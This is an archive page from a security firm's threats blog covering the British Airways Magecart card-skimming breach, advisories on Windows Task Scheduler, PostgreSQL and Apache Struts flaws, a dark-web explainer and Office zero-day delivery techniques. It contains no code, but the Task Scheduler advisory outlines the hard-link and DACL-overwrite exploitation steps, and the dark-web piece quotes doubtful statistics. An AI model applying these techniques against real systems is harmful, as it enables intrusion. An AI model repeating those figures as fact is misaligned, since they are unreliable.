Archive for category Threats

British Airways faces Data Breach of 380,000 Accounts

A malicious JavaScript code had been planted within British Airway’s website, leading to data breach of around 380,000 accounts.

 

 

RELEASE DATE: September 14th, 2018

 

 

INCIDENT

 

 

Starting from August 21st, around 380,000 accounts have been compromised in a major data breach of British Airways, revealing customers’ information. Cybersecurity organization RiskIQ believes that the Magecart attackers were involved in the breach, who have previously been associated with the Ticketmaster UK breach, earlier this year.

 

The attackers were successful in obtaining names, street and email addresses, credit card numbers, expiry dates and security codes of the airline’s customers, which could potentially lead to theft from user accounts.

 

British Airways informed that all the payment information processed through the airline’s website and mobile app between August 21st and September 5th had been exposed.

 

 

ATTACK VECTOR

 

 

The evidence reveals that a malicious JavaScript code had been planted within British Airway’s website.

 

Magecart has traditionally stolen data by injecting the malicious script into payment forms.

 

RiskIQ further informed that hackers used only 22 lines of code to get a hold of the data. (attached below)

 

 

 

The attack compromised British Airways’ own Web server, making it a highly targeted attack that aimed for this particular website and its mobile Application.

 

“This skimmer is attuned to how British Airways’ payment page is set up, which tells us that the attackers carefully considered how to target this site in particular.” Yonathan Klijnsma, head researcher at RiskIQ said.

 

 

ROOT CAUSE

 

 

The Magecart’s association with the attack was identified because the attack is web-based and targeting credit card data. The attackers focused on the unique site structure and functionality of the British Airways website and exploited their security lapses. RiskIQ crawled the scripts on the British Airways’ site and traced how they changed over time. During the process, the researchers found a modified script in the compromised site.

 

The BA site is found to be utilizing a JavaScript library called an API, on a malicious Web server at baways.com. It’s a virtual private server hosted by a provider in Lithuania, using a TS certificate registered through Comodo (to appear legitimate) on August 15. The code was injected through the JavaScript library.

 

When a customer enters information on the website’s payment form and clicks “submit”, the 22-lines of code export the entered data to the malicious server as a JSON object.

 

The customer’s transaction is not disturbed and appears to be over a secure session while the attackers receive a full copy of the payment information. The attackers also added a “touchend” callback to the script, extending the attack to BA’s mobile App as well, which also called the same modified script.

 

 

LESSON LEARNED

 

 

The British Airways website seems to be operating without visibility into its Internet-facing web assets. Therefore, the British Airways could not detect this compromise and data breach until it was too late.

 

With so many attack vectors and ever-increasing techniques of cyber-attacks, organizations should make sure that they have an intact cybersecurity implementation. With proper measures, visibility and regular penetration testing, such attacks can be nipped in the bud before they cause any damage.

 


Rewterz Threat Advisory – Microsoft Windows ‘SchRpcSetSecurity()’ Privilege Escalation Vulnerability

 A vulnerability in Microsoft Windows Task Scheduler can be exploited to gain escalated privileges.

IMPACT: MEDIUM

PUBLISH DATE: 28-08-2018

OVERVIEW

Elevated SYSTEM privileges can be gained by exploiting an error in the Microsoft Windows task scheduler. The error occurs while handling the ALPC calls related to the “SchRpcSetSecurity()” function.

 

ANALYSIS

In the handling of ALPC calls, the Microsoft Windows task scheduler contains a vulnerability which can permit a local user to gain System privileges, without needing authentication.

 

The public exploit code works on 64-bit Windows 10 and Windows Server 2016 systems. The publicly-available exploit source code can be modified to make it compatible to other systems.

 

_SchRpcSetSecurity, a part of the task scheduler ALPC endpoint, allows us to set an arbitrary DACL. It will Set the security of a file in c:\windows\tasks. Even a Guest can write here without impersonating. Before the task scheduler writes the DACL we can create a hard link to any file we have read access over. This will result in an arbitrary DACL write. This PoC will overwrite a printer related dll and use it as a hijacking vector. This is just one of the many options to abuse this.

 

The error in the Task Scheduler is that the API function SchRpcSetSecurity fails to check permissions, allowing even a guest to call it and set file permissions on anything.The vulnerability was discovered by SandboxEscaper and needs prior code execution to exploit.

 

AFFECTED PRODUCTS

Exploit currently only works on 64-bit OSes (likely Win 10 and Server 2016).

 

MITIGATION

There is currently no practical solution to address the vulnerability. Therefore, extra vigilance is required in monitoring a network user’s behavior. Network traffic analytics should be used to detect unusual behavior from traffic going across the network.

 


Rewterz Threat Advisory – Red Hat Update for postgresql

Red Hat has issued an update for postgresql. This fixes a vulnerability in which certain host connection parameters defeat client-side security defenses

IMPACT:  CRITICAL

 

PUBLISH DATE: 24-08-2018

 

OVERVIEW

Libpq, the default PostgreSQL client library, was found to be vulnerable as libpq failed to properly reset its internal state between connections. If an affected version of libpq was used with “host” or “hostaddr” connection parameters from untrusted input, attackers could bypass client-side connection security features, which enables them to acquire access to higher privileged connections or potentially cause other impacts through SQL injection, by causing the PQescape() functions to malfunction.

 

ANALYSIS:

An attacker can only exploit this vulnerability by providing or influencing connection parameters to a PostgreSQL client application using libpq. Contrib modules “dblink” and “postgres_fdw” are examples of applications affected by this flaw.Red Hat Virtualization includes vulnerable versions of postgresql.

However, this flaw is not known to be exploitable under any supported configuration of Red Hat Virtualization. A future update may address this issue.Red Hat has issued updates for fixing the said vulnerability.

 

AFFECTED PRODUCTS

Postgresql versions before 10.5, 9.6.10, 9.5.14, 9.4.19, and 9.3.24 are affected in:

  • Red Hat Software Collections (for RHEL Server) 1 for RHEL 7.5 x86_64
  • Red Hat Software Collections (for RHEL Server) 1 for RHEL 7.4 x86_64
  • Red Hat Software Collections (for RHEL Server) 1 for RHEL 7.3 x86_64
  • Red Hat Software Collections (for RHEL Server) 1 for RHEL 7 x86_64
  • Red Hat Software Collections (for RHEL Server) 1 for RHEL 6.7 x86_64
  • Red Hat Software Collections (for RHEL Server) 1 for RHEL 6 x86_64
  • Red Hat Software Collections (for RHEL Workstation) 1 for RHEL 7 x86_64
  • Red Hat Software Collections (for RHEL Workstation) 1 for RHEL 6 x86_64
  • Red Hat Virtualization Manager 4.2 x86_64

 

UPDATES

  • BZ 1508820 – CVE-2017-15098 postgresql: Memory disclosure in JSON functions
  • BZ 1508823 – CVE-2017-15099 postgresql: INSERT … ON CONFLICT DO UPDATE fails to enforce SELECT privileges
  • BZ 1539619 – CVE-2018-1053 postgresql: pg_upgrade creates file of sensitive metadata under prevailing umask
  • BZ 1547044 – CVE-2018-1058 postgresql: Uncontrolled search path element in pg_dump and other client applications
  • BZ 1609891 – CVE-2018-10915 postgresql: Certain host connection parameters defeat client-side security defenses
  • BZ 1612619 – CVE-2018-10925 postgresql: Missing authorization and memory disclosure in INSERT … ON CONFLICT DO UPDATE statements

Follow the link for further guidance on how to apply updates:

https://access.redhat.com/articles/11258


Rewterz Threat Advisory – CVE -2018-11776 Apache Struts Remote Code Execution Vulnerability

A remote code execution vulnerability exists in various versions of Apache Struts which may take over the control of a system in case a successful attack.

IMPACT:  HIGH

PUBLISH DATE:  23-08-2018

OVERVIEW

An independent security research group Semmle has released a finding confirmed by the Apache Foundation that a critical remote code execution flaw exists in the popular Struts 2 open source framework. This vulnerability is located in the core of Apache Struts 2 and impacts all supported versions of Struts 2.

The vulnerability originates from the insufficient validation of user-provided untrusted inputs in the core of the Struts  framework under certain configurations. The exploit can be triggered just by visiting a specially crafted URL on the affected web server. It enables the attackers to execute malicious code and eventually take complete control over the targeted server on which the vulnerable application is running.

 

ANALYSIS

The vulnerability involves the injection of a payload as unvalidated input into a Struts application which is then evaluated and used to cause a remote code execution.

The exploit uses an obscure expression language called OGNL, used by only a few Java based frameworks such as Struts and Spring Web Flow. The OGNL expression payload results in a remote code execution that affects Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16.

The vulnerability exists because the affected software insufficiently validates user-supplied input, allowing the use of results  with no namespace value and the use of URL tags with no value or action. In cases where upper actions or configurations also have no namespace or a wildcard namespace, an attacker could exploit this vulnerability by sending a request that submits malicious input to the affected application for processing.

Successful exploitation leads to execution of an arbitrary code in the security context of the targeted system or the affected application.

 

AFFECTED PRODUCTS

Apache Struts versions:

  • 2.3 to 2.3.342.5 to 2.5.16

VULNERABILITY INDICATORS

All applications that use Apache Struts supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) are potentially vulnerable to this flaw, even without enabling any additional plugins.

The following conditions indicate that Apache Struts is vulnerable to the Remote Code Execution flaw:

  • The “alwaysSelectFullNamespace” flag is set to true in the Struts configuration.
  • Struts configuration file contains an “action” or “URL” tag that does not specify the optional namespace attribute or specifies a wildcard namespace.

MITIGATION

Apache Struts has fixed the vulnerability with the release of Struts versions 2.3.35 and 2.5.17. Both of these versions contain the security fixes only, and no backward incompatibility issues are expected. All clients using vulnerable versions of the Apache Struts are advised to upgrade to the patched versions as soon as possible.

 


Disturbing Secrets Of The Deep And Dark Web

THE SURFACE WEB

The billions of accessible websites on the internet today seem to be overwhelming for a common man. What’s more surprising is that these surface websites are about 7-10% of the entire internet. They make up the surface web. The bulk of the internet is hidden in what’s called the deep web, or in more depth, the dark web.

 

The visible World Wide Web with its billions of publicly accessible websites are those which appear on the search engines when searched through some keywords. These are accessed through web crawler, the meta search engine responsible for merging, interlinking and ranking search results of searching platforms on the surface web. It keeps track of all the websites and links to their webpages, found on the surface web and ranks them according to their content, hence organizing them into an index.

 

UNDERSTANDING THE DEEP WEB

One step deeper into the ocean of internet lies the deep web. Websites on the deep web prevent indexing by search engines. Web crawlers are not allowed to access these websites or gather public links from them. These sites are either intentionally made inaccessible or are hidden due to their nature. Several methods are used to prevent their indexing. The linking of their webpages on surface websites or search engines is disabled by the owners, so they cannot be found through search engines. Access to them can also be denied technically, limiting access using captcha. These websites require a user to log in for accessing any page.

 

For example, large amount of content on PasteBin or GitHub with no links connecting to the source of information, are only accessed through specific search tools. Some other portals created for only specific people and accessed by their credentials only, are also examples of the deep web.

 

DEEPER INTO THE DEEP WEB; FINDING THE DARK WEB

Just like the ocean hides mysteries in its depth, the internet hides hideous tales in the depths of the dark web. The dark web is entirely a mystery with every user being anonymous.

 

 

Coming to the actual definition, the Dark Web or Dark nets are highly encrypted networks built on top of the internet and can only be accessed by specialized software. The websites on the Dark web cannot be accessed by common people surfing the surface web.

 

These unindexed sites are called dark because all of their users are anonymous. This dark web is the most popular platform for supporting illegal activities.

 

The most well-known example of illegal activity in the dark web is that of the creation of Silk Road by Ross William Ulbricht, known as dread pirate Roberts. Silk road generated $1.2 billion in 2 years and 9 months, mostly by selling illegal drugs along with other illegal activity. It was later dismantled by the federal government of USA in sept. 2013. In the same year, the usership of The Onion Router, the most common network on the dark web, reached 4 million people worldwide.

 

THE ONION ROUTER

These websites are either present on the private networks like Tor (The onion router) or on the peer-to-peer networks like the Invisible Internet Project (I2P) which can be accessed in web browsers as well. The dark web routes traffic over the network with layers of encryption to preserve anonymity of its users.

 

The dark web is not accessible for a common man. It requires access to a private network to access the dark web. The dark web enforces many restrictions to maintain privacy of its users.

 

The Onion Router browser first created by the US Navy is one of the most popular browsers used on the dark web to browse anonymously.

 

How Does Tor Maintain User Privacy?

This highly secure, easy to use, free software is installed in minutes and routes the network traffic through various Tor servers located globally. This means that if any information packet is intercepted during transmission, it’ll only show sender and receiver as random nodes.

 

Therefore, the dark web looks like a highly charged galaxy of mobile nodes. This routing node mechanism makes it impossible to trace a user’s activity on the dark web.

 

 

Many sites from the dark web have a top-level domain (TLD), ending at ‘.onion’ rather than the surface web domains like ‘.com’, ‘.org’ or ‘.gov’. These top-level domains can only be accessed with browsers or apps running on the Tor network, like Orbot or Orfox mobile apps.

 

ACCESSING A DARKNET

Darknets allow access or penetration in different ways, based on the purpose of their use, like communication or anonymous browsing. They’re also differentiated by their level of security, depending on the encryption protocols and the routing they use.

 

FRIEND-TO-FRIEND DARKNET

Friend-to-friend is a form of peer-to-peer service, which is accessible by a specific ring of IP addresses. Other IPs can be blocked by the owners to hide their presence on the network.

 

F2F network has enhanced security, having every exchange on the network encrypted with extra preventive layers of coding.

 

WHAT’S HAPPENING IN THE DARK WEB; SNEAK PEEK

Internet is a flow of information, a huge amount of which is personal information. The surface internet is evolving swiftly. Compared to the size of surface web, the deep web is huge.

 

  • In July 2016, 46% world was found to be connected to the internet.
  • Feb 2017 revealed that there were 1.154 billion websites on the surface net.
  • The Deep web is 4000 times bigger than the surface web and is growing at a rate which cannot be quantized.

 

 

The information flowing through the surface web is often attacked, stolen and sold. Medical Records, IDs, photographs, passports, credit cards Credentials, subscription accounts, browsing history, bank account details, everything is being sold in the dark web.

 

Who buys this information? Umm, it’s hard to tell. Hackers, scammers, marketers, competitors. Anyone.

 

Darknet serves as host to this black market of information. Stolen information is sold and bought there anonymously. Dark web serves as the Easy marketplace to find the right customers for any kind of information.

 

This is one of the reasons why Cryptocurrencies were readily adopted for illegal transactions, because they hide identities.

 

 

Many researchers dived into the depths to seek information regarding the activities going on in the dark web. 6,608 dark websites were crawled in January 2018, including all types of webpages from entertaining to horrifying, and this is what they found.

 

CONTENTS OF THE DARK WEB

The dark web deals with all kinds of scams and illicit content. From credit card cloning products to genius bitcoin scams, everything is available for purchase on the dark web, every passing second. Highly disturbing number of child abuse sites and extreme immoral websites were found on the dark web selling private photos and sexual content.

 

  • There are 50,000 extremist terrorist groups operating in the dark web.
  • Moreover, the 60 largest sites on the dark web have a combined data of 750 TB. Surprisingly, this data alone is 40 times larger than the data of the entire surface web combined.

 

Did You Know?

  • A Medical record is sold for $50
  • $20-100 are being earned for selling a credit card information
  • Your Social security number is worth $1 on the dark web
  • Your bank account details can be sold for $1000
  • $50 are earned for 500,000 emails
  • Mobile malware is sold for $150
  • Commercial malware is sold for $2500
  • Exploits can be as expensive as $150,000 to millions of dollars

 

THE MONOPOLY OF THE DARK WEB

The Dark web has the monopoly of breaching private information of organizations. Therefore, organizations have been paying large amounts of money to safeguard their leaked information found on the dark web. The number of breaches has gone down whereas the damages caused by each data breach have significantly gone up. In 2017, organizations paid up to $140 for saving each record from violation and misuse.

 

However, the information sold on dark web is not guaranteed to be legitimate. So, it can be falsely crafted to ruin reputations of organizations. Vendors of the information are rated by buyers to establish some level of credibility regarding what they bring to the table for selling.

 

FITTING TOR INTO THE GEOGRAPHY

The usage of The Onion Router for accessing the Dark Web cannot be marked with a geography. No country can be singled out as being responsible for the existence of the Dark web. However, as per the statistics of 2017:

 

  • The largest percentage of Tor users comes from the USA with a 19.2% usership.
  • The Russians make up 11.9% of the Tor users.
  • 9% of the Tor traffic comes from Germany.
  • Tor entertains 9.2% of the traffic coming from UAE.
  • A report by Visual Capitalist claims that 80% of Tor is funded by the US Government.

 

CONCLUSION

The commonly known websites available through search engines on the internet are called the surface web. These sites make up only 7% of the entire World Wide Web. The rest of the Internet is a highly encrypted world unavailable for general browsing, called the deep web. A concrete part of this web is used for illegal activities and is thus called the Dark web. The Dark web offers absolute anonymity to all of its users. All kinds of sensitive information, malicious software, and illegal content is sold and bought on the dark web.  While crafting security strategies, most organizations are unaware of the existence of the dark net. It’s important to consider this huge internet world as a threat factor while strategizing for mitigation of threat factors.


Latest Favorite Platform for Zero-Day Exploits: Microsoft Office

Cybercriminals turn to Microsoft Office documents for conducting their zero-day exploits, using office files to execute remotely hosted malware.

Cyberattacks are being launched using the most common tool of office work i.e. Emails. Microsoft Office documents  are usually attached to a number of emails for file transfer and data sharing. Targeting this mode of communication,  hackers use email attachments to perform remote code execution on systems. These remotely hosted malicious  components are easily transferred to a system via emails.

 

Almost all zero-day exploits from late 2017 and early 2018 have used office documents like Word files and Excel sheets. These documents aren’t suspected by common people and their malicious components are hard to detect.

 

Evolution in Techniques

MS Office has begun to have quite a linkage with cybercrimes. Researchers reveal that e-mail phishing has evolved and matured with time. Attackers have found new modes of exploiting office documents. Instead of attaching files with embedded malicious macros, they use the office files to grab remotely hosted malicious components, which launch exploits in the browser. Getting the users to ‘enable macros’ has been a common trend in the past. But with evolution of advanced security measures and an emerging tech-savvy audience, this trend has seen a decline, producing little results in favor of the attacker. Owing to the constant battle of attack and defense, advanced strategies are evolving at both ends to exploit the endpoint and to save it.

 

Down the memory lane; trouble begins with CVE-2017-0199

Word documents have never been immune to vulnerabilities. One of these loopholes, CVE-2017-0199, the MS Office/WordPad remote code execution vulnerability makes use of a logic flaw in MS Word. It popped up in 2016 when  an attack was launched using word files as carriers. Something embedded in the files was able to fetch remote  malware from the web.

 

The Object Linking and Embedding (OLE) Technology

The Object Linking and Embedding (OLE) technology is used to deliver malware to a system through which attackers  can execute codes on the compromised system.

 

The trend of remotely hosted cyberthreats has grown ever since this vulnerability was exploited. The recent “CVE-2018- 8174 Windows VBScript Engine Remote Code Execution Vulnerability” is an evidence of the emerging trend.  Exploiting the library used by Internet Explorer, this “Double Kill” bug could let an attacker execute code with the current user’s privileges.

 

A malicious RTF file attached to an email contains an OLE object, which downloads and renders a HTML page when activated. VBScript on the page uses the exploit to grab a remote payload to the endpoint.

 

Even though Microsoft has patched both CVE-2017-0199 and CVE-2018-8174; some individuals and organizations may still be vulnerable due to procrastinating with their patching.

 

Why Office Documents?

Office Documents are convenient because they can be used with applications that are targeted in the browser. Links sent in malicious emails will open in Internet Explorer. Since most systems do not have IE as their default browser, they could be having outdated and vulnerable versions of IE which will automatically be used to open the links received in emails. Hence, an Internet Explorer zero-day embedded in a word file can be used to target a system that doesn’t use IE as default browser.

 

The remotely hosted malware attacks are trending because they tend to evade the security systems. When differentiating between ‘good’ and ‘bad’ content, a security system can let a document slip if it only contains a link, whereas a document containing the malware itself can easily be scanned and detected by antiviruses.

                      

If you think you are a victim of a cyber-security attack. Immediately send an email to info@rewterz.com for a rapid response.


Copyright © Rewterz. All rights reserved.